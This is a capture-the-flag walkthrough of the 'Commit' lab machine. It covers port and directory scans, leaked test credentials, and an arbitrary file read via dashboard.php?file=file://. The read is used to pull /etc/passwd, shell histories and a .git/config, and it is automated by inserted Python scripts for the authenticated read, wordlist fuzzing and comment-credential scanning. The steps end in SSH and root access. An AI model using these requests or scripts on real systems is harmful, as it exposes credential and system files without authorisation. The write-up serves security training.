Commit Box Walkthrough

1. Information Gathering

1.1 Port scan:
┌──(root㉿kali)-[~]
└─# nmap -sV -sS -A -p- 192.168.215.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-20 03:44 EDT
Nmap scan report for 192.168.215.111
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: DevSecOps Platform v3.0
2222/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
MAC Address: 08:00:27:34:3B:D1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.215.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.10 seconds

The scan finds a web service and an SSH service, but SSH is not on port 22; it has been moved to 2222.

1.2 Directory scan:
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.111/ -t 50 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.215.111/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 280]
/login.php (Status: 200) [Size: 1661]
/uploads (Status: 301) [Size: 320] [--> http://192.168.215.111/uploads/]
/index.html (Status: 200) [Size: 2909]
/.php (Status: 403) [Size: 280]
/dashboard.php (Status: 302) [Size: 0] [--> login.php]
/.html (Status: 403) [Size: 280]
/.php (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]

Two interesting paths come back (plus /dashboard.php, which 302-redirects to the login page until you are authenticated):
http://192.168.215.111/uploads/
http://192.168.215.111/login.php

2. Vulnerability Discovery and Exploitation:

2.1 Getting a shell

curl 192.168.215.111

<body>
<h1 style="color: #2c3e50;border-bottom: 2px solid #3498db;">DevSecOps Integrated Platform</h1>

<!-- Infrastructure Monitoring - Maintained by xiaoyuega -->
<div class="system-module">
<div class="module-tag">v2.1.3</div>
<h3>Real-time Cluster Monitoring</h3>
<p>Kubernetes/Docker container performance tracking</p>
</div>

<!-- Threat Detection - Maintained by 染风 -->
<div class="system-module">
<div class="module-tag">v1.4.7</div>
<h3>Anomaly Detection System</h3>
<p>Network traffic pattern analysis module</p>
</div>

<!-- CI/CD Pipeline - Maintained by 凌动 -->
<div class="system-module">
<div class="module-tag">v3.0.0</div>
<h3>Automated Deployment Gateway</h3>
<p>GitOps workflow controller</p>
</div>

<!-- Data Analytics - Maintained by 小舟 -->
<div class="system-module">
<div class="module-tag">v4.2.1</div>
<h3>Log Correlation Engine</h3>
<p>ElasticSearch/Kibana integration layer</p>
</div>

<!-- Security Framework - Maintained by LingMj -->
<div class="system-module">
<div class="module-tag">v5.0.2</div>
<h3>Vulnerability Scanner</h3>
<p>SAST/DAST integration framework</p>
<!-- Test Account: lingmj / lingmjnb -->
</div>

<!-- Modules maintained by other users -->
<div class="system-module">
<div class="module-tag">v2.0.9</div>
<h3>API Gateway</h3>
<p>Maintained by 城南花</p>
</div>

<div class="system-module">
<div class="module-tag">v1.6.0</div>
<h3>Database Proxy</h3>
<p>Maintained by zhangb</p>
</div>

<div class="system-module">
<div class="module-tag">v3.1.4</div>
<h3>Cache Manager</h3>
<p>Maintained by nullpointer</p>
</div>

<div class="system-module">
<div class="module-tag">v0.9.1</div>
<h3>Notification Service</h3>
<p>Maintained by xiao</p>
</div>

<div class="system-module">
<div class="module-tag">v4.5.2</div>
<h3>Load Balancer</h3>
<p>Maintained by 猪肉</p>
</div>

<!-- More modules... -->
</body>
</html>

An HTML comment leaks what looks like a username and password, lingmj / lingmjnb. They do not work over SSH, but the directory scan had turned up a login page, and the pair logs in there.

The dashboard offers a file upload (images only) and a ping test, but neither filter could be bypassed. Check the page source instead:

<div class="dashboard-container">

<!-- User info card -->
<div class="card">
<h2>Welcome, lingmj</h2>
<a href="?logout" style="color: var(--primary);">Logout</a>
</div>

<!--
$file = $_GET['file'] ?? '';
if (strpos($file, 'file://') === 0) {
readfile($file);
}
-->

This is an arbitrary file read. The only check is strpos($file, 'file://') === 0, so any value that starts with file:// goes straight into readfile(), and an attacker can read every file the web server account (on Debian Apache, typically www-data) is allowed to open: configuration files, database credentials, shell histories and so on. Files readable only by root, such as /etc/shadow, remain out of reach through this bug alone.

Use the arbitrary file read:

http://192.168.215.111/dashboard.php?file=file:///etc/passwd

The passwd file shows two human users, lingmj and welcome. Next, read their shell history files:

http://192.168.215.111/dashboard.php?file=file:///home/lingmj/.bash_history

git init
vi .git/config
<!DOCTYPE html>
<html>

The history shows a .git/config being edited, so read that file next:

[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
#lingmj:10839254acf247b9e456d713d673f9ee
<!DOCTYPE html>

A commented-out line leaks a password, lingmj:10839254acf247b9e456d713d673f9ee. Use it over SSH, remembering the non-standard port:
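The same read primitive is easier to drive from a script than from the browser once there is more than one file to pull. The following is an added example, not code from the original writeup: it logs in with the leaked test account, reads /etc/passwd through dashboard.php?file=file://..., and then fetches the .bash_history of every account with an interactive shell. The login form field names (`username`, `password`) and the use of a session cookie are assumptions, not something the page confirms, and the sample response embedded at the bottom is constructed, not captured from the box.

```python
"""Added example (not from the original writeup): drive the dashboard.php file
read from a script instead of the browser.

Assumptions not confirmed by the page: login.php takes POST fields named
`username` and `password`, and the session rides on a cookie set at login.
"""
import http.cookiejar
import urllib.parse
import urllib.request

TARGET = "http://192.168.215.111"  # target address from the writeup


def make_opener():
    """An opener with a cookie jar, so the login session survives across requests."""
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))


def login(opener, username, password):
    """POST the leaked test account to login.php (field names are assumed)."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    opener.open(f"{TARGET}/login.php", data=data, timeout=10).read()


def build_url(path):
    """The only server-side check is strpos($file, 'file://') === 0,
    so any absolute path behind a file:// prefix is accepted."""
    return f"{TARGET}/dashboard.php?file=" + urllib.parse.quote("file://" + path, safe="/:")


def extract_file_content(body):
    """readfile() writes the file before the page's own HTML, so cut at <!DOCTYPE.
    A body with no file content in front returns an empty string."""
    idx = body.find("<!DOCTYPE")
    return body if idx == -1 else body[:idx]


def parse_passwd(content):
    """Return (user, home) pairs for accounts with an interactive shell."""
    users = []
    for line in content.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, home, shell = parts[0], parts[5], parts[6]
        if shell.endswith(("nologin", "/false", "/sync")):
            continue
        users.append((name, home))
    return users


def read_file(opener, path):
    """Fetch one file through the bug. Files the web server user cannot read
    come back empty; without a valid session the 302 to login.php also yields
    nothing in front of the HTML, so an empty result is ambiguous."""
    body = opener.open(build_url(path), timeout=10).read().decode(errors="replace")
    return extract_file_content(body)


# Constructed sample of what dashboard.php returns for /etc/passwd:
# the file, then the dashboard markup. Not a real capture from the box.
SAMPLE_RESPONSE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "lingmj:x:1000:1000::/home/lingmj:/bin/bash\n"
    "welcome:x:1001:1001::/home/welcome:/bin/bash\n"
    "<!DOCTYPE html>\n<html><body>Welcome, lingmj</body></html>"
)


def main():
    opener = make_opener()
    login(opener, "lingmj", "lingmjnb")
    for user, home in parse_passwd(read_file(opener, "/etc/passwd")):
        history = read_file(opener, f"{home}/.bash_history")
        print(f"== {user} ==\n{history or '(not readable or empty)'}")


if __name__ == "__main__":
    main()
```

Because readfile() output is simply prepended to the normal dashboard markup, cutting the response at the first `<!DOCTYPE` is enough to recover the file; an empty result means either the file is unreadable for the web server user or the session was not accepted, which is why the script logs in first.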

ssh lingmj@192.168.215.111 -p 2222

lingmj@Commit:~$ ls
user.txt
lingmj@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}

That gives the user flag.

3. Privilege Escalation

3.1 Escalation via information leak

A quick check of sudo and SUID binaries turns up nothing usable. But the port scan had shown SSH listening on 2222, so the daemon's configuration was clearly edited by hand; have a look at the /etc/ssh/sshd_config file:

lingmj@Commit:~$ cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.

Include /etc/ssh/sshd_config.d/*.conf

Port 2222
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
# all root login
# modify
#PermitRootLogin yes
PermitRootLogin no

# test admin/pass root/root123.
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

A comment leaks root's credentials, root/root123. Note that PermitRootLogin is set to no, so a direct SSH login as root is refused; the password has to be used from the lingmj shell (for example with su -) instead. That gives the root flag.

4. Additional Notes

The file parameter can also be fuzzed with Burp Suite (Intruder) using a path wordlist:

/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt // wordlist of candidate paths

Sorting the results by response length separates the paths that actually returned a file from the ones that came back as the bare dashboard page, and root's credentials can be found the same way.
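The length-sorting trick works because every unreadable path produces exactly the same page, so the bare dashboard is the most common response length and anything longer carries file content. The script below is an added example, not part of the original writeup: it replays the wordlist through the same dashboard.php?file= parameter with a session cookie copied from the browser, and ranks responses the way Burp's length column does. The cookie name (PHP's default PHPSESSID) and the wordlist path are assumptions; the sample responses at the bottom are constructed so the ranking logic can be checked offline.

```python
"""Added example (not from the original writeup): the Burp Intruder
sort-by-length trick as a script. Assumes the same dashboard.php?file=
parameter, an already-authenticated session cookie copied from the browser,
and the SecLists wordlist named in the writeup."""
import urllib.parse
import urllib.request

TARGET = "http://192.168.215.111"
WORDLIST = "/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt"


def fetch(path, cookie):
    """One request through the file:// read, replaying the browser's session cookie."""
    url = f"{TARGET}/dashboard.php?file=" + urllib.parse.quote("file://" + path, safe="/:")
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def baseline_length(responses):
    """Most paths are not readable by the web server user, so the most common
    response length is the bare dashboard page; that is the baseline."""
    lengths = [len(body) for body in responses.values()]
    return max(set(lengths), key=lengths.count)


def rank_hits(responses):
    """(length, path) for every response that differs from the baseline,
    longest first: the same view as Burp's length-sorted results table."""
    base = baseline_length(responses)
    return sorted(((len(b), p) for p, b in responses.items() if len(b) != base), reverse=True)


def fuzz(cookie, wordlist=WORDLIST):
    """Run the whole wordlist against the target (needs network; not exercised offline)."""
    with open(wordlist) as fh:
        paths = [line.strip() for line in fh if line.strip().startswith("/")]
    return rank_hits({p: fetch(p, cookie) for p in paths})


# Constructed responses: three paths the web server user cannot read (bare
# dashboard) and two it can (file content in front). Not a real capture.
DASHBOARD = "<!DOCTYPE html><html><body>Welcome, lingmj</body></html>"
SAMPLE_RESPONSES = {
    "/etc/shadow": DASHBOARD,
    "/etc/sudoers": DASHBOARD,
    "/root/.bash_history": DASHBOARD,
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n" + DASHBOARD,
    "/etc/ssh/sshd_config": "Port 2222\n# test admin/pass root/root123.\n" + DASHBOARD,
}

if __name__ == "__main__":
    import sys
    # argv[1] is the browser's session cookie, e.g. "PHPSESSID=..." (PHP's default name; assumed)
    for length, path in fuzz(sys.argv[1]):
        print(length, path)
```

Taking the mode of the lengths as the baseline, rather than hard-coding it, keeps the script correct even if the dashboard markup changes; a session that has expired shows up as every response having the same (login page) length and no hits at all.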

The welcome user appears in a backup copy of the passwd file under /etc.
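Both footholds on this box came from the same two habits: credentials left in comments (the .git/config and sshd_config lines) and backup copies of files lying next to the originals. The script below is an added example, not from the original writeup, that hunts for exactly those two things across a directory tree as whatever user you currently have. The token regex and the backup-suffix list are this editor's heuristics, not anything the page names, and the sample config embedded for the offline check is constructed to mirror the leaked lines.

```python
"""Added example (not part of the original writeup): look for the two leak
types this box relied on, credentials left in comments and backup copies of
config files. The regexes are the editor's own heuristics."""
import os
import re

# `name:value` or `name/value` at the start of a comment or after whitespace,
# with a value of 4+ chars that does not start with "/" (so URLs and
# PATH=/usr/bin:/bin style lines do not fire).
TOKEN_RE = re.compile(r"(?:^|(?<=[\s#]))([A-Za-z][\w.-]*)[:/]([^\s,;/][^\s,;]{3,})")
COMMENT_RE = re.compile(r"^\s*[#;]")
BACKUP_RE = re.compile(r"(\.bak|\.old|\.orig|\.save|~|-)$")


def scan_comments(text):
    """Return (line_no, name, value) for every credential-looking token on a comment line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if not COMMENT_RE.match(line):
            continue
        for name, value in TOKEN_RE.findall(line):
            hits.append((no, name, value))
    return hits


def backup_names(names):
    """Filter a list of file names down to backup-style copies (passwd-, sshd_config.bak, ...)."""
    return sorted(n for n in names if BACKUP_RE.search(n))


def scan_tree(root, max_bytes=1_000_000):
    """Walk `root` as the current user and apply both checks to whatever is readable."""
    findings, backups = [], []
    for dirpath, _dirs, files in os.walk(root):
        backups += [os.path.join(dirpath, n) for n in backup_names(files)]
        for n in files:
            p = os.path.join(dirpath, n)
            try:
                if os.path.getsize(p) > max_bytes:
                    continue
                with open(p, errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable as this user, the normal case for much of /etc
            findings += [(p, *hit) for hit in scan_comments(text)]
    return findings, backups


# Constructed sample mirroring the comment lines the box leaked. Not a real file.
SAMPLE_CONFIG = """\
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
Port 2222
#PermitRootLogin yes
# test admin/pass root/root123.
#lingmj:10839254acf247b9e456d713d673f9ee
"""

if __name__ == "__main__":
    import sys
    findings, backups = scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/etc")
    for path, no, name, value in findings:
        print(f"{path}:{no}: {name} -> {value}")
    for path in backups:
        print(f"backup copy: {path}")
```

Run it against /etc and against each home directory you can read; the trailing-dash rule catches the passwd- and shadow- copies that the shadow tools leave behind, which is where the welcome account turned up here.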

5. Summary

On future boxes, check for backup copies of configuration files and for shell history files. People are careless sometimes, and busy administrators even more so.


Author: XCDH
Published: May 21, 2025
http://example.com/2025/05/21/Commit靶机复盘/